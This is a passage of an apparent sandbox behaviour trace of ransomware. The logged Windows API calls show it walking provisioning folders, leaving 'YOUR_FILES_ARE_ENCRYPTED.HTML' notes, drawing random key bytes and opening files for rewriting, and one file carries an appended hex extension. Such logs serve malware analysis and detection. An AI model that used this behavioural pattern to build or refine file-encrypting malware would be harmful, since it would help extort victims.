ftCreationTime.dwLowDateTime=0xa1a002fa, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1a002fa, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1a002fa, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x15c, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="RunTime.xml", cAlternateFileName="")) returned 1 [0110.086] StrStrIW (lpFirst="RunTime.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.086] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime.xml") returned 101 [0110.086] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0110.086] lstrlenW (lpString=".xml") returned 4 [0110.086] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0110.086] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0110.086] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0110.087] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=348) returned 1 [0110.087] CloseHandle (hObject=0x32c) returned 1 [0110.087] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaedaa8eb, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaedaa8eb, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaedaf5d5, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.087] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaedaa8eb, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaedaa8eb, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaedaf5d5, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.087] FindClose (in: hFindFile=0x626738 | out: hFindFile=0x626738) returned 1 [0110.087] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0110.087] GetProcessHeap () returned 0x600000 [0110.087] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.087] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.087] GetProcessHeap () returned 0x600000 [0110.087] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.087] GetProcessHeap () returned 0x600000 [0110.088] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.089] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaedb308b, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaedb308b, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaedd3f56, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.089] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaedb308b, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaedb308b, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaedd3f56, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.090] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0110.090] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 114 [0110.090] GetProcessHeap () returned 0x600000 [0110.090] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.090] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.090] GetProcessHeap () returned 0x600000 [0110.090] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.090] GetProcessHeap () returned 0x600000 [0110.090] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.091] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd6b510c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaee1e716, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaee1e716, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}", cAlternateFileName="{9DF6A~1")) returned 1 [0110.091] StrStrIW (lpFirst="{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.091] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}") returned 84 [0110.091] GetProcessHeap () returned 0x600000 [0110.091] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.092] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}" [0110.092] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*" [0110.092] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd6b510c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaee1e716, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaee1e716, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x626638 [0110.092] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd6b510c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaee1e716, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaee1e716, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0110.092] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa140a197, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa140a197, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xaee21c11, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0xd1c, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="customizations.xml.A20E1B14E1AA84C10DF5703FEB5BDB1146185819BBB9132D109490FAAB168A7C", cAlternateFileName="CUSTOM~1.A20")) returned 1 [0110.092] StrStrIW (lpFirst="customizations.xml.A20E1B14E1AA84C10DF5703FEB5BDB1146185819BBB9132D109490FAAB168A7C", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.092] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml.A20E1B14E1AA84C10DF5703FEB5BDB1146185819BBB9132D109490FAAB168A7C") returned 168 [0110.092] PathFindExtensionW (pszPath="customizations.xml.A20E1B14E1AA84C10DF5703FEB5BDB1146185819BBB9132D109490FAAB168A7C") returned=".A20E1B14E1AA84C10DF5703FEB5BDB1146185819BBB9132D109490FAAB168A7C" [0110.092] lstrlenW (lpString=".A20E1B14E1AA84C10DF5703FEB5BDB1146185819BBB9132D109490FAAB168A7C") returned 65 [0110.092] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa134b56b, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa134b56b, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa134b56b, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0110.092] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.092] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\MasterDatastore.xml") returned 104 [0110.093] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0110.093] lstrlenW (lpString=".xml") returned 4 [0110.093] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0110.093] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0110.093] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\masterdatastore.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x30c [0110.093] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=271) returned 1 [0110.093] CloseHandle (hObject=0x30c) returned 1 [0110.093] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd6b510c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd6b510c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd6b510c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="Prov", cAlternateFileName="")) returned 1 [0110.093] StrStrIW (lpFirst="Prov", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.093] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov") returned 89 [0110.093] GetProcessHeap () returned 0x600000 [0110.093] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.094] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov" [0110.094] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\*" [0110.094] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd6b510c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd6b510c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaee03918, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0110.094] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd6b510c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd6b510c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaee03918, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="..", cAlternateFileName="")) returned 1 [0110.094] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd6b510c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd6b510c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd6b510c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="RunTime", cAlternateFileName="")) returned 1 [0110.094] StrStrIW (lpFirst="RunTime", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.094] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime") returned 97 [0110.094] GetProcessHeap () returned 0x600000 [0110.094] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0110.095] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime" [0110.095] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\*" [0110.095] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd6b510c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd6b510c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaedf9d02, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f455c, dwReserved1=0x6f44a8, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.095] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd6b510c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd6b510c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaedf9d02, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f455c, dwReserved1=0x6f44a8, cFileName="..", cAlternateFileName="")) returned 1 [0110.095] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa12d8e21, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa12d8e21, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa12ff08c, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x71a, dwReserved0=0x6f455c, dwReserved1=0x6f44a8, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1 [0110.095] StrStrIW (lpFirst="Power_0.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.095] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_0.provxml") returned 113 [0110.095] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0110.095] lstrlenW (lpString=".provxml") returned 8 [0110.095] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0110.095] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa13252fc, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa13252fc, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa13252fc, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x710, dwReserved0=0x6f455c, dwReserved1=0x6f44a8, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 1 [0110.095] StrStrIW (lpFirst="Power_1.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.095] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_1.provxml") returned 113 [0110.095] PathFindExtensionW (pszPath="Power_1.provxml") returned=".provxml" [0110.095] lstrlenW (lpString=".provxml") returned 8 [0110.096] PathFindExtensionW (pszPath="Power_1.provxml") returned=".provxml" [0110.096] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaedf4f5f, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaedf4f5f, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaedfd79d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f455c, dwReserved1=0x6f44a8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.096] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaedf4f5f, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaedf4f5f, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaedfd79d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f455c, dwReserved1=0x6f44a8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.096] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.096] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0110.096] GetProcessHeap () returned 0x600000 [0110.096] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0110.096] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.096] GetProcessHeap () returned 0x600000 [0110.096] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0110.096] GetProcessHeap () returned 0x600000 [0110.096] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0110.097] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa12ff08c, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa12ff08c, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa134b56b, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x139, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="RunTime.xml", cAlternateFileName="")) returned 1 [0110.097] StrStrIW (lpFirst="RunTime.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.097] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime.xml") returned 101 [0110.097] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0110.097] lstrlenW (lpString=".xml") returned 4 [0110.097] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0110.097] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0110.097] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all 